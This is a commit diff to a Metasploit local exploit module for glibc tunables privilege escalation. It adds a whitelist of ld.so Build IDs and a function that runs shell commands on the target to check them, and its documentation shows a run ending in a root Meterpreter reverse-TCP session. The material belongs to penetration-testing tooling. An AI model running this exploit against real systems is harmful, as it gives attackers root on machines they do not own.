Check Build ID before running exploit

documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md

@@ -97,14 +97,12 @@ View the full module info with the info, or info -d command.
 [*] Started reverse TCP handler on 192.168.123.1:5555
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
-[*] Writing '/tmp/2Vkty.py' (13770 bytes) ...
-[*] Running python3 /tmp/2Vkty.py
+[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
 [+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
 [*] Sending stage (3045380 bytes) to 192.168.123.228
-[+] Deleted /tmp/2Vkty.py
-[*] Meterpreter session 2 opened (192.168.123.1:5555 -> 192.168.123.228:33522) at 2023-11-15 21:58:37 -0500
+[*] Meterpreter session 5 opened (192.168.123.1:5555 -> 192.168.123.228:33016) at 2023-12-19 10:53:09 -0500
 
-meterpreter > getuid
+meterpreter >getuid
 Server username: root
 meterpreter > sysinfo
 Computer     : 192.168.123.228

modules/exploits/linux/local/glibc_tunables_priv_esc.rb

@@ -18,6 +18,15 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
 
+  BUILD_IDS =["69c048078b6c51fa8744f3d7cff3b0d9369ffd53",
+              "3602eac894717d56555552c84fc6b0e4d6a4af72",
+              "a99db3715218b641780b04323e4ae5953d68a927",
+              "a8daca28288575ffc8c7641d40901b0148958fb1",
+              "61ef896a699bb1c2e4e231642b2e1688b2f1a61e",
+              "9a9c6aeba5df4178de168e26fe30ddcdab47d374",
+              "e7b1e0ff3d359623538f4ae0ac69b3e8db26b674",
+              "956d98a11b839e3392fa1b367b1e3fdfc3e662f6"]
+
   def initialize(info = {})
     super(
       update_info(
@@ -110,9 +119,46 @@ class MetasploitModule < Msf::Exploit::Local
     CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")
   end
 
+
+  def check_ld_so_build_id
+    # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
+    if command_exists?('file ')
+      file_cmd_output = ''
+
+      # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
+      # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.
+      sysinfo = get_sysinfo
+      case sysinfo[:distro]
+      when 'ubuntu'
+        if command_exists?('ldconfig') && command_exists?('grep')
+          (file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
+        end
+      when 'debian'
+        if command_exists?('which') && command_exists?('readlink') &&
+          (file_cmd_output = cmd_exec('file "$(readlink -f "$(which ld.so)")"'))
+        end
+      end
+
+      if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
+        build_id = Regexp.last_match(1)
+        if BUILD_IDS.include?(build_id)
+          print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
+        else
+          fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
+        end
+      else
+        print_warning("Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.")
+      end
+    else
+      print_warning("Unable to locate the commands the target in order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.")
+    end
+  end
+
   def exploit
     fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?
 
+    check_ld_so_build_id
+
     python_binary = find_exec_program
     fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary
     vprint_status("Using '#{python_binary}' to run the exploit")